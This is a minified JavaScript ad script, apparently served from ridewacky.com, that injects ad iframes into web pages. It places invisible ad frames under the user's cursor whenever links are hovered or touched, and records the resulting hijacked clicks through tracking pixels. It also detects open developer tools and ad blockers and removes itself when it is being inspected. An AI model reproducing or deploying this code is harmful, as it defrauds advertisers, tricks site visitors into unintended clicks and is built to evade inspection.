(function(){var w=window,d=document,cs=document.currentScript
var co={viw:0,ov:0,tg:0,thh:255,sts1a:true,bn1:0,bn2:0,prot:function(){return(location.protocol!='data:')?location.protocol+'//':'http://';},isie:function(){return(co.isoldie()||co.isie11())},isoldie:function(){return(navigator.appName=='Microsoft Internet Explorer')},isie11:function(){return!!(navigator.userAgent.match(/Trident/)&&navigator.userAgent.match(/rv[ :]11/));},rn:function(e){var mn=0,mx=9;if(mx%2==e)--mx;if(mn%2==e)++mn;return mn+2*parseInt((Math.random()*((mx-mn)/2+1)));},isedg:function(){return(/edge\/\d./i.test(navigator.userAgent.toLowerCase()));},req:function(uri,cb){var img=d.createElement("img"),separator=(uri.indexOf('?')==-1)?'?':'&';cb=cb||this.cb();img.src=uri+separator+'h='+cb;if(co.q('d')!=undefined)img.src+='&d='+co.q('d');},pxl:function(m,cix,v){var s;if(m==0){s=(m<<13)+(v<<9)+this.viw;}else if(m==1){s=(m<<13)+(v<<8)+(co.ovr()<<4)+co.tgp();}
this.req(this.tag()+"/pxl.jpg?i="+cix+"&s="+s+"&p="+co.p());},cb:function(){return(new String(Math.random())).substring(2,8)+(((new Date()).getTime()));},p:function(){try{return encodeURIComponent(top.window.location.href.toLowerCase());}catch(e){return "";}},isab:function(cb){var test=document.createElement('div');test.innerHTML='&nbsp;';test.className='adsbox';test.id='testisab';document.body.appendChild(test);window.setTimeout(function(){if(test.offsetHeight===0){cb(true);}else{cb(false);}
var nd=document.getElementById('testisab');nd.parentNode.removeChild(nd);},100);},inif:function(){try{return w.self!==w.top;}catch(e){return true;}},isfif:function(){var dt;try{dt=w.top.document;return true;}catch(e){return false;}},orign:function(){try{return this.inif()?document.referrer:co.prot()+location.host+'/'}catch(e){return "Unknown"}},me:function(){return cs||(function(){var scripts=document.body.getElementsByTagName("script");for(var j=scripts.length;j--;){if(scripts[j].src.indexOf('ridewacky.com/t.js?i=s8yip293ft93ahfg0o&cb=0442611586971350013')!==-1)
return scripts[j];}
return scripts[scripts.length-1];})();},cont:function(el){if(this.inif()&&this.isfif()){var w=window;while(w.frameElement!=null){el=w.frameElement;w=w.parent;}}
return el;},q:function(name){if(name=(new RegExp('[?&]'+encodeURIComponent(name)+'=([^&]*)')).exec(this.me().src))
return decodeURIComponent(name[1]);},loc:function(href){var loc=document.createElement("a");loc.href=href;if(loc.host=="")
loc.href=loc.href;return loc;},tag:function(){var loc=this.loc(this.me().src),port=loc.port?':'+loc.port:'';return co.prot()+loc.hostname+port;},ins:function(method,container,el){switch(method){case 'oa':this.apA(el,container);break;case 'ob':this.apB(el,container);break;case 'ib':container.insertBefore(el,(container.hasChildNodes())?container.childNodes[0]:null);break;case 'ia':default:container.appendChild(el,(container.hasChildNodes())?container.childNodes[0]:null);};return this;},apB:function(el,container){container.parentNode.insertBefore(el,container);},apA:function(el,container){container.parentNode.insertBefore(el,container.nextSibling);},rem:function(el,mode){try{switch(mode){case 'previous':if(el.previousSibling&&el.previousSibling.parentNode){el.previousSibling.parentNode.removeChild(el.previousSibling);return true;}
break;case 'next':if(el.nextSibling&&el.nextSibling.parentNode){el.nextSibling.parentNode.removeChild(el.nextSibling);return true;}
break;default:if(el.parentNode){el.parentNode.removeChild(el);return true;}
break;}}catch(e){}
return false;},wif:function(context,size,where,cix,seed,a,cnt){var ifr=document.createElement('iframe');size=size||[728,90];where=where||'oa';ifr.width=size[0];ifr.height=size[1];ifr.setAttribute('scrolling','no');ifr.setAttribute('marginheight',0);ifr.setAttribute('marginwidth',0);ifr.setAttribute('frameBorder',0);ifr.style['overflow']='hidden';ifr.style['border']='0px';ifr.style['padding']='0px';ifr.style['margin']='0px';if(co.isoldie()){co.pxl(0,cix,1);}
else{if(cnt!=''){var content='<html><head><script>var inDapIF=true,inGptIF=true;</script><style>body { margin:0; padding:0px; background-color: #fff; }</style></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0" ondragstart="return false;" ondrop="return false;">'+cnt+'</body></html>';var rnd=seed+a;ifr.onload=function(){if(!window[rnd]){window[rnd]=true;var doc=ifr.contentWindow||ifr.contentDocument;if(doc.document){doc=doc.document;}
doc.open();doc.write(content);doc.close();}};}else{ifr.src=co.prot()+'ridewacky.com/d?i='+cix+'&a='+a+'&cb='+this.cb();}}
this.ins(where,context,ifr);this.viw++;return ifr;},destr:function(t,conf){try{co.feach(window.top.document.getElementsByTagName("a"),function(item){co.reml(item,'mouseenter',co.mi);co.reml(item,'touchstart',co.mo);});if(conf){co.rem(t);}else if(co.conf){co.rem(t);}else{setTimeout(function(){co.rp(t,st);},200);}
clearTimeout(to);}catch(e){}},wfel:function(el){var doc=el.ownerDocument;return(doc.defaultView||doc.parentWindow);},feach:function(target,callback){if((typeof target!="object"&&typeof target!="array")||typeof callback!="function")
return false;for(var k in target){if(target.hasOwnProperty(k)){callback(target[k],k);}}},addl:function(el,type,handler){var self=this;if(el.addEventListener){el.addEventListener(type,handler,false);}else{try{if(!handler.$guid)handler.$guid=self.guid++;if(!el.events)el.events={};var handlers=el.events[type];if(!handlers){handlers=el.events[type]={};if(el["on"+type]){handlers[0]=el["on"+type];}}
handlers[handler.$guid]=handler;el["on"+type]=handleEvent;}catch(e){return false;}}},reml:function(el,type,handler){var self=this;if(el.removeEventListener){el.removeEventListener(type,handler,false);}else{try{if(handler.$guid)handler.$guid=self.guid--;if(el.events)el.events={};var handlers=el.events[type];if(handlers){handlers=el.events[type]={};if(el["on"+type]){handlers[0]={};}}
handlers[handler.$guid]=handler;el["on"+type]={};}catch(e){return false;}}},ovr:function(){var rngo=Array(0,1,2,3,4,6,8,10,14,18,23,28,35,40,60);var idxo=0;for(var j=0;j<rngo.length;j++){if(this.ov>rngo[j])idxo++;}
return idxo;},tgp:function(){var rngt=Array(0,1,2,3,5,8,12,16,20,26,32,40,60,100,200);var idxt=0;for(var j=0;j<rngt.length;j++){if(this.tg>rngt[j])idxt++;}
return idxt;},clk:function(el,callback){if(!el)
return false;var self=this,w=this.wfel(el);el.callback=typeof callback=="function"?callback:function(){};self.over=false;try{w.focus();el.onmouseover=function(){w.focus();self.over=this;};el.onmouseout=function(){self.over=false;};var onblur=function(){if(self.over){self.over.callback();self.over=false;}};if(typeof w.attachEvent!='undefined')
w.attachEvent('onblur',onblur);else if(typeof w.addEventListener!='undefined')
w.addEventListener('blur',onblur,false);}catch(e){return false;}
return true;},gpos:function(el){try{var lx=0;var ly=0;var mel=el;var mwi=window;do{lx+=mel.offsetLeft;ly+=mel.offsetTop;mel=mel.offsetParent;if(mel==null){mel=mwi.frameElement;mwi=mwi.parent;}}while(mel)}catch(e){}
return{lx:lx,ly:ly};},pos:function(el,position,zindex,mode){try{var mode=mode||'absolute',zindex=zindex||el.style['z-index']||999998;el.style['position']=mode;co.feach(position,function(value,key){el.style[key]=typeof value=="number"?value+'px':value;});el.style['z-index']=zindex;}catch(e){}},rp:function(ts,st){try{if((ts!=ts1)||(co.sts1a)){var p=co.gpos(st);if((p.lx==0)&&(p.ly==0)){co.destr(ts,true);}
else{co.pos(ts,{left:p.lx,top:p.ly});}}}catch(e){}},styl:function(element,_stylecode,value){try{switch(_stylecode){case 'oy':_stylecode=_stylecode[0]+'pacit'+_stylecode[1];var ucfirst=_stylecode.charAt(0).toUpperCase()+_stylecode.slice(1);if(element.style){element.style[_stylecode]=value;element.style['-khtml-'+_stylecode]=value;element.style['-moz-'+_stylecode]=value;element.style['-ms-filter']='progid:DXImageTransform.Microsoft.Alpha('+ucfirst+'='+value+')';element.style['filter']='alpha('+_stylecode+'='+value+')';}
break;}}catch(e){}},mi:function(e){try{var target=e.currentTarget||e.target,self=this,xp=(e.pageX)?e.pageX:e.touches[0].pageX,yp=(e.pageY)?e.pageY:e.touches[0].pageY;co.ov++;if(co.ov>co.om){co.destr(ts1,co.conf);}
if(ts1){co.sts1a=false;co.styl(ts1,'oy',co.op);co.pos(ts1,{left:xp-co.wh,top:yp-co.hh},999998);}}catch(e){}},mo:function(e){try{if(ts1){co.styl(ts1,'oy',co.op);co.pos(ts1,{left:co.lp,top:co.tp});}}catch(e){}},mo2:function(e){try{if(ts1){co.sts1a=true;co.rp(ts1,st);co.styl(ts1,'oy',1);ts1.style['z-index']=-1;}}catch(e){}},dtd:function(){if(co.bn2==0){co.bn2=1;co.pxl(0,cix,8);try{co.destr(ccn,true);}catch(e){}}},ism:function(){var check=false;(function(a){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4)))check=true;})(navigator.userAgent||navigator.vendor||window.opera);return check;},ismot:function(){var check=false;(function(a){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino|android|ipad|playbook|silk/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4)))check=true;})(navigator.userAgent||navigator.vendor||window.opera);return check;},iev:function(){var itv=setInterval(function(){try{var tw=top.window;var wTh=tw.outerWidth-tw.innerWidth>co.thh;var hTh=tw.outerHeight-tw.innerHeight>co.thh;if(!co.ismot()){if(!(hTh&&wTh)&&((tw.Firebug&&tw.Firebug.chrome&&tw.Firebug.chrome.isInitialized)||wTh||hTh)){clearInterval(itv);co.dtd();}}}catch(e){}},200);var a=new Date()
var element=new Image();Object.defineProperty(element,'id',{get:function(){var diff=Math.abs(a.getTime()-new Date().getTime())
if(diff>1000){co.dtd();}}});console.log("%c",element);},dif:function(event){try{if(event.data.toString().substr(0,4)=='dif:'){var ifrs=top.document.body.getElementsByTagName("iframe");for(var j=ifrs.length;j--;){if(ifrs[j].src.indexOf(event.data.substr(4))!==-1){ifrs[j].parentNode.removeChild(ifrs[j]);}}}}catch(e){}}};var v=0,to,cix='s8yip293ft93ahfg0o',me=co.me(),ad=co.cont(),st;co.v="1.2.18";co.om=20,co.op=0;co.w=300,co.h=250,co.lp=-2*60*60,co.tp=0,co.wh=co.w/2,co.hh=co.h/2,co.conf=false,co.rnnd=co.cb();function pwif(cix,da,crsl,st,sp){var m,retm;var idx=0;var il=[];da.forEach(it=>{il[idx]=co.wif(crsl,[co.w,co.h],'ia',cix,co.rnnd,it.c+co.rn(0),it.tf);co.rp(il[idx],st);il[idx].style['z-index']=-1;co.addl(il[idx],'mouseout',co.mo2);if(idx==0)retm=il[idx];idx++;});top.window.addEventListener("resize",()=>{il.forEach(it=>{co.rp(it,st)});},false);setInterval(()=>{il.forEach(it=>{co.rp(it,st)});},20);return retm;}
st=co.wif(me,[co.w,co.h],'',cix,co.rnnd,'0f197f9cec935878e9924c74134db76b'+co.rn(1),'<script async src="https://securepubads.g.doubleclick.net/tag/js/gpt.js"></script> <script>   window.googletag = window.googletag || {cmd: []};   googletag.cmd.push(function() {     googletag.defineSlot("/21671350435/300x250-bibliaon", [300, 250], "div-gpt-ad-1541591347223-0").addService(googletag.pubads());     googletag.pubads().enableSingleRequest();     googletag.enableServices();   }); </script> <!-- /21671350435/300x250-bibliaon --> <div id="div-gpt-ad-1541591347223-0" style="height:250px; width:300px;"> <script> googletag.cmd.push(function() { googletag.display("div-gpt-ad-1541591347223-0"); }); </script> </div>');v+=4;if(!ad){ad=st;}
co.clk(ad,function(){co.pxl(1,cix,16+0);});co.iev();var ccn=document.createElement('div');var crsl=document.createElement('div');var crsl_ctrl=document.createElement('div');ccn.className='wrap-row-12';crsl.className='fb-carousel-ads';crsl_ctrl.className='fb-carousel-ads-controls';co.ins('oa',window.top.document.body,ccn);co.ins('ia',ccn,crsl);co.ins('ia',crsl,crsl_ctrl);var da=[];var sda=[];da.push({c:'b5943cab9797ea838d64523d46b63b3e',ii:4,tf:''},{c:'164c21fe35e8eb659f557fbee37f4241',ii:8,tf:''},{c:'363ea3efdbee3f265cb4750b5fdfeb2b',ii:3,tf:''},{c:'9e37e0bc90d4b47c0bc6941037b217a0',ii:10,tf:''},{c:'60e3bafbcd912ecd1bd0d95a59e46973',ii:7,tf:''},{c:'f8c06deccd1c91c46bfe21c3b18d03e3',ii:1,tf:''},{c:'aebf9e53950d4300ec777b2cd4973f59',ii:2,tf:''},{c:'7cfbe962e22118ab11db6968a8dbe844',ii:9,tf:''},{c:'469aea2f7b6cc5acb758eedcf8c1de94',ii:6,tf:''},{c:'0ecbd9d1cef7b49fdbd05cf2a1bc1e85',ii:11,tf:''},{c:'80c05a6d4d33fa5d89e6a35816d4d0e0',ii:5,tf:''},);var ts1=pwif(cix,da,crsl,st,0);top.window.addEventListener("message",co.dif,false);if(co.isfif()&&!co.isoldie()){v+=2;co.addl(ts1,'mouseout',co.mo2);to=setTimeout(function(){co.destr(ts1,co.conf);},60*1000);co.feach(window.top.document.getElementsByTagName("a"),function(item){co.addl(item,'mouseenter',co.mi);co.addl(item,'touchstart',co.mi);});co.clk(ts1,function(){co.pxl(1,cix,4);setTimeout(function(){co.rem(ts1);},500);});}
top.window.addEventListener("message",co.dif,false);co.isab(function(active){if(active){v-=4;}
setInterval(function(){co.tg++;},1000);co.pxl(0,cix,v);});})();